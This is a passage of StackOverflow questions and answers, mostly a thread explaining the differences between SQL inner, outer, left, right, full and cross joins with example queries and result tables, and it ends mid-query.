A: Since it is an Identity column and you haven't saved it to the database yet it is -1. I am assuming here that this is before you save the table back to the database, correct? You need to perform the insert before that value will be set correctly.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38510",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Distributed caching with .NET 2.0+? What is the best approach to implement distributed caching with .NET?
Edit: I was looking for a general caching schema for internal and external applications
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38548",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: What is the difference between "INNER JOIN" and "OUTER JOIN"? Also, how do LEFT OUTER JOIN, RIGHT OUTER JOIN, and FULL OUTER JOIN fit in?
A: The Venn diagrams don't really do it for me.
They don't show any distinction between a cross join and an inner join, for example, or more generally show any distinction between different types of join predicate or provide a framework for reasoning about how they will operate.
There is no substitute for understanding the logical processing and it is relatively straightforward to grasp anyway.
*
*Imagine a cross join.
*Evaluate the on clause against all rows from step 1 keeping those where the predicate evaluates to true
*(For outer joins only) add back in any outer rows that were lost in step 2.
(NB: In practice the query optimiser may find more efficient ways of executing the query than the purely logical description above but the final result must be the same)
I'll start off with an animated version of a full outer join. Further explanation follows.
Explanation
Source Tables
First start with a CROSS JOIN (AKA Cartesian Product). This does not have an ON clause and simply returns every combination of rows from the two tables.
SELECT A.Colour, B.Colour FROM A CROSS JOIN B
Inner and Outer joins have an "ON" clause predicate.
*
*Inner Join. Evaluate the condition in the "ON" clause for all rows in the cross join result. If true return the joined row. Otherwise discard it.
*Left Outer Join. Same as inner join then for any rows in the left table that did not match anything output these with NULL values for the right table columns.
*Right Outer Join. Same as inner join then for any rows in the right table that did not match anything output these with NULL values for the left table columns.
*Full Outer Join. Same as inner join then preserve left non matched rows as in left outer join and right non matching rows as per right outer join.
Some examples
SELECT A.Colour, B.Colour FROM A INNER JOIN B ON A.Colour = B.Colour
The above is the classic equi join.
Animated Version
SELECT A.Colour, B.Colour FROM A INNER JOIN B ON A.Colour NOT IN ('Green','Blue')
The inner join condition need not necessarily be an equality condition and it need not reference columns from both (or even either) of the tables. Evaluating A.Colour NOT IN ('Green','Blue') on each row of the cross join returns.
SELECT A.Colour, B.Colour FROM A INNER JOIN B ON 1 =1
The join condition evaluates to true for all rows in the cross join result so this is just the same as a cross join. I won't repeat the picture of the 16 rows again.
SELECT A.Colour, B.Colour FROM A LEFT OUTER JOIN B ON A.Colour = B.Colour
Outer Joins are logically evaluated in the same way as inner joins except that if a row from the left table (for a left join) does not join with any rows from the right hand table at all it is preserved in the result with NULL values for the right hand columns.
SELECT A.Colour, B.Colour FROM A LEFT OUTER JOIN B ON A.Colour = B.Colour WHERE B.Colour IS NULL
This simply restricts the previous result to only return the rows where B.Colour IS NULL. In this particular case these will be the rows that were preserved as they had no match in the right hand table and the query returns the single red row not matched in table B. This is known as an anti semi join.
It is important to select a column for the IS NULL test that is either not nullable or for which the join condition ensures that any NULL values will be excluded in order for this pattern to work correctly and avoid just bringing back rows which happen to have a NULL value for that column in addition to the un matched rows.
SELECT A.Colour, B.Colour FROM A RIGHT OUTER JOIN B ON A.Colour = B.Colour
Right outer joins act similarly to left outer joins except they preserve non matching rows from the right table and null extend the left hand columns.
SELECT A.Colour, B.Colour FROM A FULL OUTER JOIN B ON A.Colour = B.Colour
Full outer joins combine the behaviour of left and right joins and preserve the non matching rows from both the left and the right tables.
SELECT A.Colour, B.Colour FROM A FULL OUTER JOIN B ON 1 = 0
No rows in the cross join match the 1=0 predicate. All rows from both sides are preserved using normal outer join rules with NULL in the columns from the table on the other side.
SELECT COALESCE(A.Colour, B.Colour) AS Colour FROM A FULL OUTER JOIN B ON 1 = 0
With a minor amend to the preceding query one could simulate a UNION ALL of the two tables.
SELECT A.Colour, B.Colour FROM A LEFT OUTER JOIN B ON A.Colour = B.Colour WHERE B.Colour = 'Green'
Note that the WHERE clause (if present) logically runs after the join. One common error is to perform a left outer join and then include a WHERE clause with a condition on the right table that ends up excluding the non matching rows. The above ends up performing the outer join...
... And then the "Where" clause runs. NULL= 'Green' does not evaluate to true so the row preserved by the outer join ends up discarded (along with the blue one) effectively converting the join back to an inner one.
If the intention was to include only rows from B where Colour is Green and all rows from A regardless the correct syntax would be
SELECT A.Colour, B.Colour FROM A LEFT OUTER JOIN B ON A.Colour = B.Colour AND B.Colour = 'Green'
SQL Fiddle
See these examples run live at SQLFiddle.com.
A: left join on returns inner join on rows union all unmatched left table rows extended by nulls.
right join on returns inner join on rows union all unmatched right table rows extended by nulls.
full join on returns inner join on rowsunion all unmatched left table rows extended by nulls union all unmatched right table rows extended by nulls.
outer is optional & has no effect.
(SQL Standard 2006 SQL/Foundation 7.7 Syntax Rules 1, General Rules 1 b, 3 c & d, 5 b.)
So don't outer join on until you know what underlying inner join on is involved.
Find out what rows inner join on returns:
CROSS JOIN vs INNER JOIN in SQL
That also explains why Venn(-like) diagrams are not helpful for inner vs outer join.
For more on why they are not helpful for joins generally:
Venn Diagram for Natural Join
A: In simple words :
Inner join -> Take ONLY common records from parent and child tables WHERE primary key of Parent table matches Foreign key in Child table.
Left join ->
pseudo code
1.Take All records from left Table
2.for(each record in right table,) {
if(Records from left & right table matching on primary & foreign key){
use their values as it is as result of join at the right side for 2nd table.
} else {
put value NULL values in that particular record as result of join at the right side for 2nd table.
}
}
Right join : Exactly opposite of left join . Put name of table in LEFT JOIN at right side in Right join , you get same output as LEFT JOIN.
Outer join : Show all records in Both tables No matter what. If records in Left table are not matching to right table based on Primary , Forieign key , use NULL value as result of join .
Example :
Lets assume now for 2 tables
1.employees , 2.phone_numbers_employees
employees : id , name
phone_numbers_employees : id , phone_num , emp_id
Here , employees table is Master table , phone_numbers_employees is child table(it contains emp_id as foreign key which connects employee.id so its child table.)
Inner joins
Take the records of 2 tables ONLY IF Primary key of employees table(its id) matches Foreign key of Child table phone_numbers_employees(emp_id).
So query would be :
SELECT e.id , e.name , p.phone_num FROM employees AS e INNER JOIN phone_numbers_employees AS p ON e.id = p.emp_id;
Here take only matching rows on primary key = foreign key as explained above.Here non matching rows on primary key = foreign key are skipped as result of join.
Left joins :
Left join retains all rows of the left table, regardless of whether there is a row that matches on the right table.
SELECT e.id , e.name , p.phone_num FROM employees AS e LEFT JOIN phone_numbers_employees AS p ON e.id = p.emp_id;
Outer joins :
SELECT e.id , e.name , p.phone_num FROM employees AS e OUTER JOIN phone_numbers_employees AS p ON e.id = p.emp_id;
Diagramatically it looks like :
A: You use INNER JOIN to return all rows from both tables where there is a match. i.e. In the resulting table all the rows and columns will have values.
In OUTER JOIN the resulting table may have empty columns. Outer join may be either LEFT or RIGHT.
LEFT OUTER JOIN returns all the rows from the first table, even if there are no matches in the second table.
RIGHT OUTER JOIN returns all the rows from the second table, even if there are no matches in the first table.
A: INNER JOIN requires there is at least a match in comparing the two tables. For example, table A and table B which implies A ٨ B (A intersection B).
LEFT OUTER JOIN and LEFT JOIN are the same. It gives all the records matching in both tables and all possibilities of the left table.
Similarly, RIGHT OUTER JOIN and RIGHT JOIN are the same. It gives all the records matching in both tables and all possibilities of the right table.
FULL JOIN is the combination of LEFT OUTER JOIN and RIGHT OUTER JOIN without duplication.
A: Assuming you're joining on columns with no duplicates, which is a very common case:
*
*An inner join of A and B gives the result of A intersect B, i.e. the inner part of a Venn diagram intersection.
*An outer join of A and B gives the results of A union B, i.e. the outer parts of a Venn diagram union.
Examples
Suppose you have two tables, with a single column each, and data as follows:
A B
- -
1 3
2 4
3 5
4 6
Note that (1,2) are unique to A, (3,4) are common, and (5,6) are unique to B.
Inner join
An inner join using either of the equivalent queries gives the intersection of the two tables, i.e. the two rows they have in common.
select * from a INNER JOIN b on a.a = b.b;
select a.*, b.* from a,b where a.a = b.b;
a | b
--+--
3 | 3
4 | 4
Left outer join
A left outer join will give all rows in A, plus any common rows in B.
select * from a LEFT OUTER JOIN b on a.a = b.b;
select a.*, b.* from a,b where a.a = b.b(+);
a | b
--+-----
1 | null
2 | null
3 | 3
4 | 4
Right outer join
A right outer join will give all rows in B, plus any common rows in A.
select * from a RIGHT OUTER JOIN b on a.a = b.b;
select a.*, b.* from a,b where a.a(+) = b.b;
a | b
-----+----
3 | 3
4 | 4
null | 5
null | 6
Full outer join
A full outer join will give you the union of A and B, i.e. all the rows in A and all the rows in B. If something in A doesn't have a corresponding datum in B, then the B portion is null, and vice versa.
select * from a FULL OUTER JOIN b on a.a = b.b;
a | b
-----+-----
1 | null
2 | null
3 | 3
4 | 4
null | 6
null | 5
A: The answer is in the meaning of each one, so in the results.
Note :
In SQLite there is no RIGHT OUTER JOIN or FULL OUTER JOIN.
And also in MySQL there is no FULL OUTER JOIN.
My answer is based on above Note.
When you have two tables like these:
--[table1] --[table2]
id | name id | name
---+------- ---+-------
1 | a1 1 | a2
2 | b1 3 | b2
CROSS JOIN / OUTER JOIN :
You can have all of those tables data with CROSS JOIN or just with , like this:
SELECT * FROM table1, table2
--[OR]
SELECT * FROM table1 CROSS JOIN table2
--[Results:]
id | name | id | name
---+------+----+------
1 | a1 | 1 | a2
1 | a1 | 3 | b2
2 | b1 | 1 | a2
2 | b1 | 3 | b2
INNER JOIN :
When you want to add a filter to above results based on a relation like table1.id = table2.id you can use INNER JOIN:
SELECT * FROM table1, table2 WHERE table1.id = table2.id
--[OR]
SELECT * FROM table1 INNER JOIN table2 ON table1.id = table2.id
--[Results:]
id | name | id | name
---+------+----+------
1 | a1 | 1 | a2
LEFT [OUTER] JOIN :
When you want to have all rows of one of tables in the above result -with same relation- you can use LEFT JOIN:
(For RIGHT JOIN just change place of tables)
SELECT * FROM table1, table2 WHERE table1.id = table2.id
UNION ALL
SELECT *, Null, Null FROM table1 WHERE Not table1.id In (SELECT id FROM table2)
--[OR]
SELECT * FROM table1 LEFT JOIN table2 ON table1.id = table2.id
--[Results:]
id | name | id | name
---+------+------+------
1 | a1 | 1 | a2
2 | b1 | Null | Null
FULL OUTER JOIN :
When you also want to have all rows of the other table in your results you can use FULL OUTER JOIN:
SELECT * FROM table1, table2 WHERE table1.id = table2.id
UNION ALL
SELECT *, Null, Null FROM table1 WHERE Not table1.id In (SELECT id FROM table2)
UNION ALL
SELECT Null, Null, * FROM table2 WHERE Not table2.id In (SELECT id FROM table1)
--[OR] (recommended for SQLite)
SELECT * FROM table1 LEFT JOIN table2 ON table1.id = table2.id
UNION ALL
SELECT * FROM table2 LEFT JOIN table1 ON table2.id = table1.id
WHERE table1.id IS NULL
--[OR]
SELECT * FROM table1 FULL OUTER JOIN table2 On table1.id = table2.id
--[Results:]
id | name | id | name
-----+------+------+------
1 | a1 | 1 | a2
2 | b1 | Null | Null
Null | Null | 3 | b2
Well, as your need you choose each one that covers your need ;).
A: 1.Inner Join: Also called as Join. It returns the rows present in both the Left table, and right table only if there is a match. Otherwise, it returns zero records.
Example:
SELECT
e1.emp_name,
e2.emp_salary
FROM emp1 e1
INNER JOIN emp2 e2
ON e1.emp_id = e2.emp_id
2.Full Outer Join: Also called as Full Join. It returns all the rows present in both the Left table, and right table.
Example:
SELECT
e1.emp_name,
e2.emp_salary
FROM emp1 e1
FULL OUTER JOIN emp2 e2
ON e1.emp_id = e2.emp_id
3.Left Outer join: Or simply called as Left Join. It returns all the rows present in the Left table and matching rows from the right table (if any).
4.Right Outer Join: Also called as Right Join. It returns matching rows from the left table (if any), and all the rows present in the Right table.
Advantages of Joins
*
*Executes faster.
A: Inner join.
A join is combining the rows from two tables. An inner join attempts to match up the two tables based on the criteria you specify in the query, and only returns the rows that match. If a row from the first table in the join matches two rows in the second table, then two rows will be returned in the results. If there’s a row in the first table that doesn’t match a row in the second, it’s not returned; likewise, if there’s a row in the second table that doesn’t match a row in the first, it’s not returned.
Outer Join.
A left join attempts to find match up the rows from the first table to rows in the second table. If it can’t find a match, it will return the columns from the first table and leave the columns from the second table blank (null).
A: *
*Inner join - An inner join using either of the equivalent queries gives the intersection of the two tables, i.e. the two rows they have in common.
*Left outer join - A left outer join will give all rows in A, plus any common rows in B.
*Full outer join - A full outer join will give you the union of A and B, i.e. All the rows in A and all the rows in B. If something in A doesn't have a corresponding datum in B, then the B portion is null, and vice versay
A: Joins are more easily explained with an example:
To simulate persons and emails stored in separate tables,
Table A and Table B are joined by Table_A.id = Table_B.name_id
Inner Join
Only matched ids' rows are shown.
Outer Joins
Matched ids and not matched rows for Table A are shown.
Matched ids and not matched rows for Table B are shown.
Matched ids and not matched rows from both Tables are shown.
Note: Full outer join is not available on MySQL
A:
*
*INNER JOIN most typical join for two or more tables.
It returns data match on both table ON primarykey and forignkey relation.
*OUTER JOIN is same as INNER JOIN, but it also include NULL data on ResultSet.
*
*LEFT JOIN = INNER JOIN + Unmatched data of left table with Null match on right table.
*RIGHT JOIN = INNER JOIN + Unmatched data of right table with Null match on left table.
*FULL JOIN = INNER JOIN + Unmatched data on both right and left tables with Null matches.
*Self join is not a keyword in SQL, when a table references data in itself knows as self join. Using INNER JOIN and OUTER JOIN we can write self join queries.
For example:
SELECT *
FROM tablea a
INNER JOIN tableb b
ON a.primary_key = b.foreign_key
INNER JOIN tablec c
ON b.primary_key = c.foreign_key
A: I don't see much details about performance and optimizer in the other answers.
Sometimes it is good to know that only INNER JOIN is associative which means the optimizer has the most option to play with it. It can reorder the join order to make it faster keeping the same result. The optimizer can use the most join modes.
Generally it is a good practice to try to use INNER JOIN instead of the different kind of joins. (Of course if it is possible considering the expected result set.)
There are a couple of good examples and explanation here about this strange associative behavior:
*
*Are left outer joins associative?
*Does the join order matter in SQL?
A: Having criticized the much-loved red-shaded Venn diagram, I thought it only fair to post my own attempt.
Although @Martin Smith's answer is the best of this bunch by a long way, his only shows the key column from each table, whereas I think ideally non-key columns should also be shown.
The best I could do in the half hour allowed, I still don't think it adequately shows that the nulls are there due to absence of key values in TableB or that OUTER JOIN is actually a union rather than a join:
A: The precise algorithm for INNER JOIN, LEFT/RIGHT OUTER JOIN are as following:
*
*Take each row from the first table: a
*Consider all rows from second table beside it: (a, b[i])
*Evaluate the ON ... clause against each pair: ON( a, b[i] ) = true/false?
*
*When the condition evaluates to true, return that combined row (a, b[i]).
*When reach end of second table without any match, and this is an Outer Join then return a (virtual) pair using Null for all columns of other table: (a, Null) for LEFT outer join or (Null, b) for RIGHT outer join. This is to ensure all rows of first table exists in final results.
Note: the condition specified in ON clause could be anything, it is not required to use Primary Keys (and you don't need to always refer to Columns from both tables)! For example:
*
*... ON T1.title = T2.title AND T1.version < T2.version ( => see this post as a sample usage: Select only rows with max value on a column)
*... ON T1.y IS NULL
*... ON 1 = 0 (just as sample)
Note: Left Join = Left Outer Join, Right Join = Right Outer Join.
A: Consider below 2 tables:
EMP
empid name dept_id salary
1 Rob 1 100
2 Mark 1 300
3 John 2 100
4 Mary 2 300
5 Bill 3 700
6 Jose 6 400
Department
deptid name
1 IT
2 Accounts
3 Security
4 HR
5 R&D
Inner Join:
Mostly written as just JOIN in sql queries. It returns only the matching records between the tables.
Find out all employees and their department names:
Select a.empid, a.name, b.name as dept_name
FROM emp a
JOIN department b
ON a.dept_id = b.deptid
;
empid name dept_name
1 Rob IT
2 Mark IT
3 John Accounts
4 Mary Accounts
5 Bill Security
As you see above, Jose is not printed from EMP in the output as it's dept_id 6 does not find a match in the Department table. Similarly, HR and R&D rows are not printed from Department table as they didn't find a match in the Emp table.
So, INNER JOIN or just JOIN, returns only matching rows.
LEFT JOIN :
This returns all records from the LEFT table and only matching records from the RIGHT table.
Select a.empid, a.name, b.name as dept_name
FROM emp a
LEFT JOIN department b
ON a.dept_id = b.deptid
;
empid name dept_name
1 Rob IT
2 Mark IT
3 John Accounts
4 Mary Accounts
5 Bill Security
6 Jose
So, if you observe the above output, all records from the LEFT table(Emp) are printed with just matching records from RIGHT table.
HR and R&D rows are not printed from Department table as they didn't find a match in the Emp table on dept_id.
So, LEFT JOIN returns ALL rows from Left table and only matching rows from RIGHT table.
Can also check DEMO here.
A: There are a lot of good answers here with very accurate relational algebra examples. Here is a very simplified answer that might be helpful for amateur or novice coders with SQL coding dilemmas.
Basically, more often than not, JOIN queries boil down to two cases:
For a SELECT of a subset of A data:
*
*use INNER JOIN when the related B data you are looking for MUST exist per database design;
*use LEFT JOIN when the related B data you are looking for MIGHT or MIGHT NOT exist per database design.
A: Simplest Definitions
Inner Join: Returns matched records from both tables.
Full Outer Join: Returns matched and unmatched records from both tables with null for unmatched records from Both Tables.
Left Outer Join: Returns matched and unmatched records only from table on Left Side.
Right Outer Join: Returns matched and unmatched records only from table on Right Side.
In-Short
Matched + Left Unmatched + Right Unmatched = Full Outer Join
Matched + Left Unmatched = Left Outer Join
Matched + Right Unmatched = Right Outer Join
Matched = Inner Join
A: The General Idea
Please see the answer by Martin Smith for a better illustations and explanations of the different joins, including and especially differences between FULL OUTER JOIN, RIGHT OUTER JOIN and LEFT OUTER JOIN.
These two table form a basis for the representation of the JOINs below:
CROSS JOIN
SELECT *
FROM citizen
CROSS JOIN postalcode
The result will be the Cartesian products of all combinations. No JOIN condition required:
INNER JOIN
INNER JOIN is the same as simply: JOIN
SELECT *
FROM citizen c
JOIN postalcode p ON c.postal = p.postal
The result will be combinations that satisfies the required JOIN condition:
LEFT OUTER JOIN
LEFT OUTER JOIN is the same as LEFT JOIN
SELECT *
FROM citizen c
LEFT JOIN postalcode p ON c.postal = p.postal
The result will be everything from citizen even if there are no matches in postalcode. Again a JOIN condition is required:
Data for playing
All examples have been run on an Oracle 18c. They're available at dbfiddle.uk which is also where screenshots of tables came from.
CREATE TABLE citizen (id NUMBER,
name VARCHAR2(20),
postal NUMBER, -- <-- could do with a redesign to postalcode.id instead.
leader NUMBER);
CREATE TABLE postalcode (id NUMBER,
postal NUMBER,
city VARCHAR2(20),
area VARCHAR2(20));
INSERT INTO citizen (id, name, postal, leader)
SELECT 1, 'Smith', 2200, null FROM DUAL
UNION SELECT 2, 'Green', 31006, 1 FROM DUAL
UNION SELECT 3, 'Jensen', 623, 1 FROM DUAL;
INSERT INTO postalcode (id, postal, city, area)
SELECT 1, 2200, 'BigCity', 'Geancy' FROM DUAL
UNION SELECT 2, 31006, 'SmallTown', 'Snizkim' FROM DUAL
UNION SELECT 3, 31006, 'Settlement', 'Moon' FROM DUAL -- <-- Uuh-uhh.
UNION SELECT 4, 78567390, 'LookoutTowerX89', 'Space' FROM DUAL;
Blurry boundaries when playing with JOIN and WHERE
CROSS JOIN
CROSS JOIN resulting in rows as The General Idea/INNER JOIN:
SELECT *
FROM citizen c
CROSS JOIN postalcode p
WHERE c.postal = p.postal -- < -- The WHERE condition is limiting the resulting rows
Using CROSS JOIN to get the result of a LEFT OUTER JOIN requires tricks like adding in a NULL row. It's omitted.
INNER JOIN
INNER JOIN becomes a cartesian products. It's the same as The General Idea/CROSS JOIN:
SELECT *
FROM citizen c
JOIN postalcode p ON 1 = 1 -- < -- The ON condition makes it a CROSS JOIN
This is where the inner join can really be seen as the cross join with results not matching the condition removed. Here none of the resulting rows are removed.
Using INNER JOIN to get the result of a LEFT OUTER JOIN also requires tricks. It's omitted.
LEFT OUTER JOIN
LEFT JOIN results in rows as The General Idea/CROSS JOIN:
SELECT *
FROM citizen c
LEFT JOIN postalcode p ON 1 = 1 -- < -- The ON condition makes it a CROSS JOIN
LEFT JOIN results in rows as The General Idea/INNER JOIN:
SELECT *
FROM citizen c
LEFT JOIN postalcode p ON c.postal = p.postal
WHERE p.postal IS NOT NULL -- < -- removed the row where there's no mathcing result from postalcode
The troubles with the Venn diagram
An image internet search on "sql join cross inner outer" will show a multitude of Venn diagrams. I used to have a printed copy of one on my desk. But there are issues with the representation.
Venn diagram are excellent for set theory, where an element can be in one or both sets. But for databases, an element in one "set" seem, to me, to be a row in a table, and therefore not also present in any other tables. There is no such thing as one row present in multiple tables. A row is unique to the table.
Self joins are a corner case where each element is in fact the same in both sets. But it's still not free of any of the issues below.
The set A represents the set on the left (the citizen table) and the set B is the set on the right (the postalcode table) in below discussion.
CROSS JOIN
Every element in both sets are matched with every element in the other set, meaning we need A amount of every B elements and B amount of every A elements to properly represent this Cartesian product. Set theory isn't made for multiple identical elements in a set, so I find Venn diagrams to properly represent it impractical/impossible. It doesn't seem that UNION fits at all.
The rows are distinct. The UNION is 7 rows in total. But they're incompatible for a common SQL results set. And this is not how a CROSS JOIN works at all:
Trying to represent it like this:
..but now it just looks like an INTERSECTION, which it's certainly not. Furthermore there's no element in the INTERSECTION that is actually in any of the two distinct sets. However, it looks very much like the searchable results similar to this:
For reference one searchable result for CROSS JOINs can be seen at Tutorialgateway. The INTERSECTION, just like this one, is empty.
INNER JOIN
The value of an element depends on the JOIN condition. It's possible to represent this under the condition that every row becomes unique to that condition. Meaning id=x is only true for one row. Once a row in table A (citizen) matches multiple rows in table B (postalcode) under the JOIN condition, the result has the same problems as the CROSS JOIN: The row needs to be represented multiple times, and the set theory isn't really made for that. Under the condition of uniqueness, the diagram could work though, but keep in mind that the JOIN condition determines the placement of an element in the diagram. Looking only at the values of the JOIN condition with the rest of the row just along for the ride:
This representation falls completely apart when using an INNER JOIN with a ON 1 = 1 condition making it into a CROSS JOIN.
With a self-JOIN, the rows are in fact idential elements in both tables, but representing the tables as both A and B isn't very suitable. For example a common self-JOIN condition that makes an element in A to be matching a different element in B is ON A.parent = B.child, making the match from A to B on seperate elements. From the examples that would be a SQL like this:
SELECT *
FROM citizen c1
JOIN citizen c2 ON c1.id = c2.leader
Meaning Smith is the leader of both Green and Jensen.
OUTER JOIN
Again the troubles begin when one row has multiple matches to rows in the other table. This is further complicated because the OUTER JOIN can be though of as to match the empty set. But in set theory the union of any set C and an empty set, is always just C. The empty set adds nothing. The representation of this LEFT OUTER JOIN is usually just showing all of A to illustrate that rows in A are selected regardless of whether there is a match or not from B. The "matching elements" however has the same problems as the illustration above. They depend on the condition. And the empty set seems to have wandered over to A:
WHERE clause - making sense
Finding all rows from a CROSS JOIN with Smith and postalcode on the Moon:
SELECT *
FROM citizen c
CROSS JOIN postalcode p
WHERE c.name = 'Smith'
AND p.area = 'Moon';
Now the Venn diagram isn't used to reflect the JOIN. It's used only for the WHERE clause:
..and that makes sense.
When INTERSECT and UNION makes sense
INTERSECT
As explained an INNER JOIN is not really an INTERSECT. However INTERSECTs can be used on results of seperate queries. Here a Venn diagram makes sense, because the elements from the seperate queries are in fact rows that either belonging to just one of the results or both. Intersect will obviously only return results where the row is present in both queries. This SQL will result in the same row as the one above WHERE, and the Venn diagram will also be the same:
SELECT *
FROM citizen c
CROSS JOIN postalcode p
WHERE c.name = 'Smith'
INTERSECT
SELECT *
FROM citizen c
CROSS JOIN postalcode p
WHERE p.area = 'Moon';
UNION
An OUTER JOIN is not a UNION. However UNION work under the same conditions as INTERSECT, resulting in a return of all results combining both SELECTs:
SELECT *
FROM citizen c
CROSS JOIN postalcode p
WHERE c.name = 'Smith'
UNION
SELECT *
FROM citizen c
CROSS JOIN postalcode p
WHERE p.area = 'Moon';
which is equivalent to:
SELECT *
FROM citizen c
CROSS JOIN postalcode p
WHERE c.name = 'Smith'
OR p.area = 'Moon';
..and gives the result:
Also here a Venn diagram makes sense:
When it doesn't apply
An important note is that these only work when the structure of the results from the two SELECT's are the same, enabling a comparison or union. The results of these two will not enable that:
SELECT *
FROM citizen
WHERE name = 'Smith'
SELECT *
FROM postalcode
WHERE area = 'Moon';
..trying to combine the results with UNION gives a
ORA-01790: expression must have same datatype as corresponding expression
For further interest read Say NO to Venn Diagrams When Explaining JOINs and sql joins as venn diagram. Both also cover EXCEPT.
A: Joins are used to combine the data from two tables, with the result being a new, temporary table. Joins are performed based on something called a predicate, which specifies the condition to use in order to perform a join. The difference between an inner join and an outer join is that an inner join will return only the rows that actually match based on the join predicate.
For eg- Lets consider Employee and Location table:
Employee
EmpID
EmpName
13
Jason
8
Alex
3
Ram
17
Babu
25
Johnson
Location
EmpID
EmpLoc
13
San Jose
8
Los Angeles
3
Pune, India
17
Chennai, India
39
Bangalore, India
Inner Join:-
Inner join creates a new result table by combining column values of two tables (Employee and Location) based upon the join-predicate. The query compares each row of Employee with each row of Location to find all pairs of rows which satisfy the join-predicate. When the join-predicate is satisfied by matching non-NULL values, column values for each matched pair of rows of Employee and Location are combined into a result row.
Here’s what the SQL for an inner join will look like:
select * from employee inner join location on employee.empID = location.empID
OR
select * from employee, location where employee.empID = location.empID
Now, here is what the result of running that SQL would look like:
Employee.EmpId
Employee.EmpName
Location.EmpId
Location.EmpLoc
13
Jason
13
San Jose
8
Alex
8
Los Angeles
3
Ram
3
Pune, India
17
Babu
17
Chennai, India
Outer Join:-
An outer join does not require each record in the two joined tables to have a matching record. The joined table retains each record—even if no other matching record exists. Outer joins subdivide further into left outer joins and right outer joins, depending on which table's rows are retained (left or right).
Left Outer Join:-
The result of a left outer join (or simply left join) for tables Employee and Location always contains all records of the "left" table (Employee), even if the join-condition does not find any matching record in the "right" table (Location).
Here is what the SQL for a left outer join would look like, using the tables above:
select * from employee left outer join location on employee.empID = location.empID;
//Use of outer keyword is optional
Now, here is what the result of running this SQL would look like:
Employee.EmpId
Employee.EmpName
Location.EmpId
Location.EmpLoc
13
Jason
13
San Jose
8
Alex
8
Los Angeles
3
Ram
3
Pune, India
17
Babu
17
Chennai, India
25
Johnson
NULL
NULL
Note how while Johnson has no entry in the employee location table, he is still included in the results but the location fields are nulled.
Right Outer Join:-
A right outer join (or right join) closely resembles a left outer join, except with the treatment of the tables reversed. Every row from the "right" table (Location) will appear in the joined table at least once. If no matching row from the "left" table (Employee) exists, NULL will appear in columns from Employee for those records that have no match in Location.
This is what the SQL looks like:
select * from employee right outer join location on employee.empID = location.empID;
//Use of outer keyword is optional
Using the tables above, we can show what the result set of a right outer join would look like:
Employee.EmpId
Employee.EmpName
Location.EmpId
Location.EmpLoc
13
Jason
13
San Jose
8
Alex
8
Los Angeles
3
Ram
3
Pune, India
17
Babu
17
Chennai, India
NULL
NULL
39
Bangalore, India
Note how while there are no employees listed as working in Bangalore, it is still included in the results with the employee fields nulled out.
Full Outer Joins:-
Full Outer Join or Full Join is to retain the nonmatching information by including nonmatching rows in the results of a join, use a full outer join. It includes all rows from both tables, regardless of whether or not the other table has a matching value.
Employee.EmpId
Employee.EmpName
Location.EmpId
Location.EmpLoc
13
Jason
13
San Jose
8
Alex
8
Los Angeles
3
Ram
3
Pune, India
17
Babu
17
Chennai, India
25
Johnson
NULL
NULL
NULL
NULL
39
Bangalore, India
MySQL 8.0 Reference Manual - Join Syntax
Oracle Join operations
A: The difference between inner join and outer join is as follow:
*
*Inner join is a join that combined tables based on matching tuples, whereas outer join is a join that combined table based on both matched and unmatched tuple.
*Inner join merges matched row from two table in where unmatched row are omitted, whereas outer join merges rows from two tables and unmatched rows fill with null value.
*Inner join is like an intersection operation, whereas outer join is like an union operation.
*Inner join is two types, whereas outer join are three types.
*outer join is faster than inner join.
A: Inner Join
Retrieve the matched rows only, that is, A intersect B.
SELECT *
FROM dbo.Students S
INNER JOIN dbo.Advisors A
ON S.Advisor_ID = A.Advisor_ID
Left Outer Join
Select all records from the first table, and any records in the second
table that match the joined keys.
SELECT *
FROM dbo.Students S
LEFT JOIN dbo.Advisors A
ON S.Advisor_ID = A.Advisor_ID
Full Outer Join
Select all records from the second table, and any records in the first
table that match the joined keys.
SELECT *
FROM dbo.Students S
FULL JOIN dbo.Advisors A
ON S.Advisor_ID = A.Advisor_ID
References
*
*Inner and outer joins SQL examples and the Join block
*SQL: JOINS
A: In Simple Terms,
1.INNER JOIN OR EQUI JOIN : Returns the resultset that matches only the condition in both the tables.
2.OUTER JOIN : Returns the resultset of all the values from both the tables even if there is condition match or not.
3.LEFT JOIN : Returns the resultset of all the values from left table and only rows that match the condition in right table.
4.RIGHT JOIN : Returns the resultset of all the values from right table and only rows that match the condition in left table.
5.FULL JOIN : Full Join and Full outer Join are same.
A: In simple words:
An inner join retrieve the matched rows only.
Whereas an outer join retrieve the matched rows from one table and all rows in other table ....the result depends on which one you are using:
*
*Left: Matched rows in the right table and all rows in the left table
*Right: Matched rows in the left table and all rows in the right table or
*Full: All rows in all tables. It doesn't matter if there is a match or not
A: A inner join only shows rows if there is a matching record on the other (right) side of the join.
A (left) outer join shows rows for each record on the left hand side, even if there are no matching rows on the other (right) side of the join. If there is no matching row, the columns for the other (right) side would show NULLs.
A: Inner joins require that a record with a related ID exist in the joined table.
Outer joins will return records for the left side even if nothing exists for the right side.
For instance, you have an Orders and an OrderDetails table. They are related by an "OrderID".
Orders
*
*OrderID
*CustomerName
OrderDetails
*
*OrderDetailID
*OrderID
*ProductName
*Qty
*Price
The request
SELECT Orders.OrderID, Orders.CustomerName
FROM Orders
INNER JOIN OrderDetails
ON Orders.OrderID = OrderDetails.OrderID
will only return Orders that also have something in the OrderDetails table.
If you change it to OUTER LEFT JOIN
SELECT Orders.OrderID, Orders.CustomerName
FROM Orders
LEFT JOIN OrderDetails
ON Orders.OrderID = OrderDetails.OrderID
then it will return records from the Orders table even if they have no OrderDetails records.
You can use this to find Orders that do not have any OrderDetails indicating a possible orphaned order by adding a where clause like WHERE OrderDetails.OrderID IS NULL.
A: A Demonstration
Setup
Hop into psql and create a tiny database of cats and humans.
You can just copy-paste this whole section.
CREATE DATABASE catdb;
\c catdb;
\pset null '[NULL]' -- how to display null values
CREATE TABLE humans (
name text primary key
);
CREATE TABLE cats (
human_name text references humans(name),
name text
);
INSERT INTO humans (name)
VALUES ('Abe'), ('Ann'), ('Ben'), ('Jen');
INSERT INTO cats (human_name, name)
VALUES
('Abe', 'Axel'),
(NULL, 'Bitty'),
('Jen', 'Jellybean'),
('Jen', 'Juniper');
Querying
Here's a query we'll run several times, changing [SOMETHING JOIN] to the various types to see the results.
SELECT
humans.name AS human_name,
cats.name AS cat_name
FROM humans
